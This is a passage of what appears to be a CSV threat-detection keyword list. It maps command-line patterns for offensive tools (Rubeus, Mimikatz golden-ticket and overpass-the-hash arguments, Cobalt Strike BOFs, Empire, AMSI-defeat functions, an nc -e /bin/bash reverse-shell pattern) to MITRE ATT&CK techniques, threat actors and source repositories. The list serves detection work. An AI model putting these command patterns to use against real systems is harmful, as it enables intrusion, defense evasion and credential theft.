T1037","TA0003","N/A","N/A","Persistence","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"* /bin/nc * -e /bin/bash*> * crontab cron*","greyware_tool_keyword","nc","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"* /c sc query 
WinDefend*","greyware_tool_keyword","sc","Get information about Windows Defender service","T1518.001 - T1049","TA0007 - TA0009","N/A","N/A","Discovery","https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"* /cmdtech:* /cmd:* /impuser:*","offensive_tool_keyword","SharpSQLPwn","C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/lefayjey/SharpSQLPwn","1","0","N/A","N/A","1","74","15","2022-02-13T19:15:36Z","2022-01-20T19:58:07Z" +"* /cmdtech:* /cmd:* /query:*","offensive_tool_keyword","SharpSQLPwn","C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/lefayjey/SharpSQLPwn","1","0","N/A","N/A","1","74","15","2022-02-13T19:15:36Z","2022-01-20T19:58:07Z" +"* /create /tn Notion /tr \*cmd.exe* -c *\* /sc onlogon /ru System\*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","0","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" +"* /createnetonly:*cmd.exe*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /createnetonly:*cmd.exe*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /credpassword*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /creduser:* /credpassword:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /impersonateuser:* /msdsspn:* /ptt*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /ldap * /printcmd*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /ldapfilter:'admincount=1'*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /modules:* /target:* /linkedsql:*","offensive_tool_keyword","SharpSQLPwn","C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/lefayjey/SharpSQLPwn","1","0","N/A","N/A","1","74","15","2022-02-13T19:15:36Z","2022-01-20T19:58:07Z" +"* /NAME:* /KILL*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"* /nofullpacsig 
*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /outfile:* /spn:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /outfile:* /spns:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /PID:* /DRIVER:*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"* /PID:* /KILL*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - 
T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"* /pwdsetafter:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /pwdsetbefore:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /rc4opsec *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /s4uproxytarget*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /s4utransitedservices*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /service:krbtgt *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /simple * /spn*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /ticket *.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /ticket:* /autoenterprise *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /ticket:*.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /user:* /domain:* /aes256:* /run:powershell.exe*","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Mimikatz Overpass-the-hash a more opsec-safe version that uses the AES256 key (similar to with Rubeus above) - works for multiple Mimikatz commands","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* /user:* /domain:* /ntlm:* /run:powershell.exe*","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Mimikatz Overpass-the-hash (more risky than Rubeus writes to LSASS memory)","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* /user:* /domain:* /sid:S-1-5-21-* /krbtgt:* /id:* /groups:* /startoffset:0 /endin:600 /renewmax:10080 /ptt*","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Mimikatz Golden ticket (domain admin w/ some ticket properties to avoid detection)","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* /usetgtdeleg *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* \Temp\blah.exe*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","0","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* | Find-AmsiSignatures*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"* | Test-ContainsAmsiSignatures*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"* > \\127.0.0.1\ADMIN$\__* 2>&1","offensive_tool_keyword","malware","Destructive Malware targeting organizations","T1486 T1059","TA0008","N/A","N/A","Ransomware","https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* > Wi-Fi-PASS*","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"* 0.0.0.0:8080 --threads*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"* 1.2.3.4:8080*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","0","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"* 4444 meter","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"* 4444 shell","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"* '46993522-7D77-4B59-9B77-F82082DE9D81' *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"* -64 -format=bof *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
